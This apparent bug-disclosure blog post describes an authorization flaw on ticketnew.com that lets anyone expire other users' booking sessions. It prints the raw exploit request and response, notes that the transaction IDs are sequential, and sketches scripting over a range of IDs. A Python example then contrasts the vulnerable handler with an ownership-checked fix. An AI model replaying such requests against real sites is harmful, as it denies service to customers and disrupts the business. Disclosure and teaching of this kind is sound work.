How I would have stopped you from booking tickets on ticketnew.com!
TicketNew is an online portal for booking movie tickets in all the major cities in India. The company was acquired by PayTM and is backed by Alibaba Pictures because of its growing customer base and smooth UX.
Recently I found a bug that would have stopped you from booking tickets on the website.
While intercepting the application's GET and POST requests with Burp Suite, I noticed a POST request that was used to expire my current user session. This request got my attention because it carried the transaction id as a parameter.
Request:
POST /calls/ExpiresOngoingTrans HTTP/1.1
Host: www.ticketnew.com
Connection: close
Content-Length: 20
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://www.ticketnew.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36
Content-Type: application/json; charset=UTF-8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: https://www.ticketnew.com/onlinetheatre/Theatre/SelectSeats.aspx?ReqDate=MjAyMC0wMi0wNw==-PwCFBtJZUGI=&VenueID=MTI1NTU=-T/n6zIyzhxc=&EventID=NDQ0NTExMQ==-sT6KuIpYoKI=&LevelID=MA==-110A7HeCwRM=&ReqSeats=MTA=-zISu+SIzx8g=&SiteInfo=MA%3d%3d-110A7HeCwRM%3d&MovieURL=aHR0cHM6Ly93d3cudGlja2V0bmV3LmNvbS8xOTE3LU1vdmllLVRpY2tldHMtT25saW5lLVNob3ctVGltaW5ncy9PbmxpbmUtQWR2YW5jZS1Cb29raW5nLzIxNzI1L0MvTXVtYmFp-v0fP02S1Ens=
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: ASP.NET_SessionId=lhmdgjpzu0cxqijhm1aecetk; __cfduid=db9a19cbf8ceb72f349dca687188f9d461581018226; TN=Mumbai; tkttransid=60500800

{"TransID":60500852}
My first thought was to try expiring other users' sessions by changing the id. I sent the request to Burp Repeater and replaced the 'TransID' with that of another user session, which I had initiated in incognito mode in a different browser. And boom, that session expired even before the time allotted by TicketNew.
Response:
HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Date: Thu, 06 Feb 2020 21:04:17 GMT
Server: Microsoft-IIS/8.5
Set-Cookie: tkttransid=60500800; expires=Sat, 06-Feb-2010 21:04:17 GMT; path=/
Vary: Accept-Encoding
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 9
Connection: Close

{"d":"1"}
The server did not check where the request was coming from, nor whether the caller was authorized to expire that transaction.
Another interesting thing I noticed was that the transaction IDs assigned to sessions were sequential, so it was easy for me to predict the next session IDs and send the POST request. Writing a script that sends the POST request over a range of consecutive IDs would not be hard for anyone. Using this bug, anyone could stop a user from booking tickets until they got frustrated and left the site, causing potential revenue loss for the company.
TicketNew is a fairly big company, and with PayTM as its parent, their response was not professional. However, since the bug has been resolved, I have written this article in line with proper disclosure policy.
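To show the two defects above in code, here is an added example (not TicketNew's code; the in-memory store, handler names and the {"d":"0"} reply for an already-expired id are assumptions) modelling the ExpiresOngoingTrans endpoint: the vulnerable handler trusts the TransID in the body outright, while the hardened handler only expires a transaction owned by the calling session, and transaction ids can be drawn unguessably instead of from a sequential counter.

```python
"""Constructed model of /calls/ExpiresOngoingTrans: a missing ownership check.

Not TicketNew's implementation. Each ASP.NET session that opens a seat hold
gets one transaction id; the handler below receives the caller's session id
(from the ASP.NET_SessionId cookie) and the parsed JSON body.
"""
import secrets
from dataclasses import dataclass, field


@dataclass
class Store:
    owner_of: dict = field(default_factory=dict)   # trans_id -> session id that opened it
    active: set = field(default_factory=set)       # transaction ids still live
    next_id: int = 60500800                        # sequential counter, as seen in the post


def start_transaction(store: Store, session_id: str, sequential: bool = True) -> str:
    """Open a seat hold. Sequential ids (as observed) are guessable; the hardened
    variant draws a random 128-bit id so a foreign TransID cannot be predicted."""
    if sequential:
        trans_id = str(store.next_id)
        store.next_id += 1
    else:
        trans_id = secrets.token_urlsafe(16)
    store.owner_of[trans_id] = session_id
    store.active.add(trans_id)
    return trans_id


def expire_vulnerable(store: Store, session_id: str, body: dict) -> tuple:
    """Behaviour described in the post: whatever TransID the body carries gets
    expired, regardless of which session sent the request."""
    trans_id = str(body.get("TransID", ""))
    if trans_id in store.active:
        store.active.discard(trans_id)
        return 200, {"d": "1"}
    return 200, {"d": "0"}   # assumed reply when there is nothing to expire


def expire_fixed(store: Store, session_id: str, body: dict) -> tuple:
    """Hardened handler: the transaction must belong to the calling session.
    Unknown and foreign ids get the same 403, so the endpoint also cannot be
    used to probe which transaction ids exist."""
    trans_id = str(body.get("TransID", ""))
    if store.owner_of.get(trans_id) != session_id:
        return 403, {"error": "transaction not owned by this session"}
    store.active.discard(trans_id)
    return 200, {"d": "1"}
```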